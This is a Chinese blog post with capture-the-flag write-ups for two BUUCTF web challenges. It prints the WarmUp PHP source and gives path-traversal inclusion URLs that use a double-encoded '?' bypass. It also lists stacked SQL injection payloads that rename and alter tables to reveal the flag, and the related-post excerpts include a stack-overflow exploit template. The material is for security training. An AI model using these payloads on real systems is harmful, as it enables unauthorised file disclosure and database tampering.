buuctf--web篇01WarmUp

最新推荐文章于 2025-06-02 11:32:48 发布
最新推荐文章于 2025-06-02 11:32:48 发布
阅读量944 收藏 3
点赞数
CC 4.0 BY-SA版权
分类专栏: # buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43901038/article/details/106027556
本文解析了HCTF2018 WarmUp题目中如何通过源码访问限制获取flag,以及强网杯2019中利用SQL注入技巧修改数据库表结构直接读取flag的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 [HCTF 2018]WarmUp

参考链接:https://blog.youkuaiyun.com/zouchengzhi1021/article/details/104173137
打开源码,发现source.php字样,添加在后面,然后就看见了php代码。如下:

<?php
    highlight_file(__FILE__);//highlight_file() 函数对文件进行语法高亮显示。
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
            //isset() -- 检测变量是否设置,并且不是 NULL。
            //is_string() — 检测变量是否是字符串。
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
            //in_array() 函数搜索数组中是否存在指定的值。返回true或者flase
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );//截取0到'?'前面的字符串
            //mb_substr($str,start,length):在str中从start开始截取长度为length的中文字符串(起始位置为0)
            //mb_strpos() — 查找字符串在另一个字符串中首次出现的位置
            
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);//urldecode() — 解码已编码的 URL 字符串
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

	//$_REQUEST — HTTP Request 变量
    //默认情况下包含了 $_GET$_POST$_COOKIE 的数组。
    if (! empty($_REQUEST['file'])       
    	&& is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) 
    {
        include $_REQUEST['file'];
        exit;
    } 
    else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

从源码中我们可以发现:

  • 1、可以访问source.php和hint.php文件(如下图,flag四个字符重复了四次)
    在这里插入图片描述
  • 2、在函数checkfile()中,我们可以发现四个 if 语句。第一个是检测 $_page 的值是否为空,后面的均是检测 $whitelist 是否在 $_page里面。
//$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
//关联数组:类似于键值

if (in_array($_page, $whitelist)) {
                return true;
            }
  • 3、截取$_page从0到?之前的字符串
$_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );//截取0到'?'前面的字符串
  • 4、flag需要满足的条件:主要在于满足 emmm::checkFile($_REQUEST[‘file’])
	//$_REQUEST — HTTP Request 变量
    //默认情况下包含了 $_GET,$_POST 和 $_COOKIE 的数组。
    
    if (! empty($_REQUEST['file'])       
    	&& is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) 
    {
        include $_REQUEST['file'];
        exit;
    }

REQUEST利用 …/ 跳转目录读取 flag,可以一次一次 …/ 尝试,我发现ffffllllaaaagggg都为四个,所以可能四次跳转,直接尝试。

http://c05ffe15-d87d-44ac-abb1-187b9e8a19da.node3.buuoj.cn/source.php?file=hint.php?/../../../../ffffllllaaaagggg
或者;
http://c05ffe15-d87d-44ac-abb1-187b9e8a19da.node3.buuoj.cn/source.php?file=hint.php%253f/../../../../ffffllllaaaagggg

问号’?‘两次编码值为’%253f’。
先进行url解码再截取,因此我们可以将?经过两次url编码,在服务器端提取参数时解码一次,checkFile函数中解码一次,仍会解码为’?’,仍可通过第四个if语句校验。(’?‘两次编码值为’%253f’),

在这里插入图片描述

0x02 [强网杯 2019]随便注

参考链接:https://www.cnblogs.com/peri0d/p/12123814.html
在这里插入图片描述

这道题,涨知识了,第一次知道原来可以直接使用show()进行显示的。

http://e43f3155-6442-4b72-8d99-99ba63e5e8f1.node3.buuoj.cn/
?inject=1'%23 //返回正常,单引号闭合,字符型注入
?inject=1';show databases;%23 //显示所有的数据库
?inject=1';show tables;%23 //显示所有的表格
?inject=1';show columns from `1919810931114514`;%23
?inject=1';show columns from `words`;%23

//构造payload
?inject=1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;%23

//获取flag
/?inject=1' or '1'='1

?inject=1’%23 //返回正常,单引号闭合,字符型注入
在这里插入图片描述
?inject=1’;show databases;%23 //显示所有的数据库
在这里插入图片描述
?inject=1’;show tables;%23 //显示所有的表格
在这里插入图片描述

?inject=1’;show columns from 1919810931114514;%23
?inject=1’;show columns from words;%23
在这里插入图片描述

既然没过滤 alert 和 rename,那就可以把表和列改名。先把 words 改为 words1,再把数字表改为 words,然后把新的 words 表里的 flag 列改为 id ,这样就可以直接查询 flag 了

//构造payload
?inject=1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;%23

在这里插入图片描述
使用 /?inject=1’ or ‘1’='1 访问一下即可获得 flag
在这里插入图片描述

2020/0509 每日一剂

只要你愿意,并为之坚持,总有一天,你会活成自己喜欢的模样。

-----from my PC

BUUCTF web WarmUp
A_dmin的博客
06-07 1万+
BUUCTF web WarmUp 一天一道CTF题目,能多不能少 打开页面,一个滑稽,查看源码,得到source.php,输入得到源码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { ...
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2619
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
BUUCTF[HCTF 2018]WarmUp 1题解
最新发布
2301_79896143的博客
06-02 1027
BUUCTF[HCTF 2018]WarmUp题解:通过分析滑稽表情页面的PHP源码,发现文件包含漏洞。代码审计显示程序以白名单方式检查文件参数,但可通过构造payload绕过。利用hint.php提示的flag文件名,在参数后添加?/../../../../路径遍历访问根目录的ffffllllaaaagggg文件。最终通过多层../目录跳转获取flag{966bef86-ebda-43d8-8703-8e6a57b211de}。考察PHP代码审计和目录遍历漏洞利用能力。
BUUCTF Web WarmUp1
qq_52429415的博客
03-07 799
BUUCTF Web WarmUp1 进入网站后发现什么也没有 按F12查看原代码,发现PHP发现新的PHP(hit.php) 发现flag在ffffllllaaaagggg中 仔细分析代码 因为flag在ffffllllaaaagggg中 为了读到ffffllllaaaagggg 可以加?file=source.php?/ffffllllaaaagggg 因为传入后服务器会自动解一次码 所以第二个问号要自己url加密一次 ?file=source.php%3f/ffffllllaaaagggg 因为后来还
BUUCTF-WarmUp 1
z1moq的博客
09-06 578
根据提示,本题主要是以php代码审计为主 开启靶机后进入靶机 发现什么都没有 打开源码 发现注释中有一个提示,打开提示所在页面 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.
BUUCTF web题目 之WarmUp
m0_54993799的博客
12-10 1941
BUUCTF web题目之WarmUp
[BUUCTF-web] warmup
qq_45766280的博客
08-12 196
BUUCTF-web warmup知识点题目 知识点 php代码审计 phpmyadmin 4.8.1的一个远程文件包含的漏洞 目录穿越 题目 打开靶机,只有一张图,先F12 有东西,转到这个文件中 有代码,代码审计没跑了 先来看看代码 里面有设置白名单 $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; 去hint.php里看看 果然没有那么简单,还是回去老老实实的看代码吧 <?php highlight_file(_
BUUCTF--WEB
书山有路勤为径,学海无涯苦作舟
06-28 1407
可以猜测,这个输入框是搜索当前数据库里的表id号应该,回显得数据就是表words里的两个字段id和data,但是我们flag在当前数据库的。他的后端既然能做到数字回显字母不回显,说明有一个 或 结构,而且不直接回显flag,但作为一道题目,from一定是from flag。mb_substr($page,n,m):返回page中从第n位开始,到n+m位字符串的值。再跳转到新的页面什么也没有就结束了,所以在这个页面,我们请点击抓包,就能发现他的秘密。内联函数:将指定的函数体插入并取代每一处调用该函数的地方。
buuctf web warmup详细题解
weixin_64160292的博客
03-31 3476
题目:warmup 题目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,...
BUUCTF[HCTF 2018]WarmUp 1
10-21
CTF竞赛是网络安全领域中的一项竞技活动,通常包括解密、编码、二进制分析、逆向工程和Web漏洞挖掘等多种类型。在CTF竞赛中,参赛者通常需要解决一系列涉及网络安全的知识点和逻辑问题。 7. **文件包含漏洞**: ...
BUUCTF-WEB-WarmUp
weixin_43345082的博客
07-26 710
source.php页面看源码 <?php     highlight_file(__FILE__);     class emmm     {         public&nb...
buuctf——Warmup
qq_51796436的博客
03-05 1280
打开题目F12有注释source.php 那访问网址:题目/source.php出现如下题目代码:
Buuctf WarmUp1
qq_51802152的博客
12-24 343
buuctf 滑稽的笑脸 也是一道简单的注入题
BUUCTF-[HCTF 2018]WarmUp1
Monica的博客
09-03 3153
目录 题目: 知识点: 分析: 遇到的问题: 一、服务端会对传入的参数自动进行一次urldecode,并且对于不能url解码的字符串再次进行url解码,字符串不会变化 二、include相对路径问题 题目: 打开环境发现只有一个滑稽,日常查看源代码,发现有个source.php 访问url/source.php 得到源码 <?php highlight_file(__FILE__); class emmm { public sta...
BUUCTF-WarmUp
weixin_51383898的博客
10-06 195
回到checkFile函数,发现hint.php字样,尝试访问,得到flag在ffffllllaaaagggg中,那么接下来就是如何访问ffffllllaaaagggg。主要判断逻辑:先对file进行判断是否为空,是否为字符串,是否满足emmm类中的checkFile函数检查,都满足随后执行文件包含include。解题思路:让checkFile函数返回true的同时,又能成功访问ffffllllaaaagggg。f12,查看源代码,有个source.php提示。页面没有反应,想到文件包含漏洞,
BUUCTF: [HCTF 2018]WarmUp 1
emdog的博客
10-21 2771
1、打开链接,只有这个笑脸,首先想到的肯定是查看源码 2、按下F12或者是Ct+U查看源码,如下显示,可以看到有source.php注释 3、通过在原URL后添加/source.php,可查看到如下内容,进行代码审计,分析源码。 <?php highlight_file(__FILE__); class emmm { //传入变量,也就是file,赋值给page public static function checkFile(&$page
BUUCTFWEB-WarmUp
weixin_45486362的博客
05-25 287
warm 来到题目,一来就是一个表情包 在这里插入图片描述 啥也不说,直接查看源代码 看见source.php的提示,直接加入url进行访问 得到一段代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php",
buuctf warmup
01-13
### BUUCTF Warmup 题目解决方案 在处理BUUCTF平台上的Warmup题目时,通常这些题目旨在帮助参赛者熟悉比赛环境和基本技巧。对于warmup_csaw_2016这类涉及栈溢出覆盖返回地址的题目[^3],解决方法主要依赖于理解程序内存布局以及如何利用缓冲区溢出来控制程序流。 #### 利用栈溢出漏洞获取Flag 针对此类问题的一个常见策略是通过精心构建输入来触发栈溢出,进而修改函数返回地址指向攻击者指定的位置。具体操作如下: ```c #include <stdio.h> #include <string.h> void vulnerable_function(char *str) { char buffer[64]; strcpy(buffer, str); // Potential stack overflow here. } int main(int argc, char **argv) { if (argc > 1) vulnerable_function(argv[1]); } ``` 为了成功完成此挑战,可以采用以下Python脚本生成恶意负载,并发送给目标服务以实现对`/bin/sh`或其他命令执行路径的有效调用,最终读取标志文件的内容。 ```python from pwn import * # Connect to the remote service or start a local process conn = remote('target_ip', port) payload = b'A' * offset_to_return_address + pack(return_address_value) # Send payload and interact with shell conn.sendline(payload) conn.interactive() ``` 上述代码片段展示了如何创建一个简单的网络连接对象并与之交互;同时构造了一个由填充字符组成的有效载荷,其长度足以填满原始缓冲区并覆盖返回地址字段。这里假设已知偏移量(`offset_to_return_address`)及期望跳转的目标位置(`return_address_value`)。 当面对其他类型的Web应用安全测试场景时,比如LFI(Local File Inclusion),则可能涉及到使用PHP过滤器绕过某些限制条件从而直接访问敏感数据的情况。例如,在查询字符串参数中加入特定模式可使服务器端解析为Base64编码后的源码展示形式[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值